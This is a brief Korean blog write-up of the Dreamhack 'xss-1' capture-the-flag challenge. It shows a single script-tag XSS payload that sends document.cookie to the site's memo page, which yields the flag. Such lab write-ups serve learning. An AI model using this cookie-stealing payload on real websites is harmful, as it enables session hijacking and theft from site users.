[Dreamhack] xss-1

#코딩노예#·2022년 8월 31일
0

문제 사이트에 접속하면 3개의 연결된 페이지들의 목록이 나옵니다.

flag 페이지로 들어가면 입력창이 떠서 XSS 공격을 시도해볼 수 있습니다.


<script>location.href = "/memo?memo=" + document.cookie;</script>

script 태그를 이용해서 XSS 공격을 시도해 보면

공격이 성공해서 FLAG가 출력되었습니다.

0개의 댓글